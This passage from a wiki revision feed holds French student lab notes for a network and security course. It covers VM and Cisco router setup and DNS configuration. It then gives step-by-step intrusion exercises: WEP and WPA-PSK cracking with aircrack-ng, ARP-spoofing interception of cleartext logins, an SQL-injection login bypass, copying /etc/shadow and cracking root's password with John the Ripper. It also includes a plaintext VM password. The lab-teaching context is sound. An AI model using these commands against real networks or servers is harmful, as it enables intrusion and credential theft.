Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53714</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53714"/>
				<updated>2020-11-16T14:52:47Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; &lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
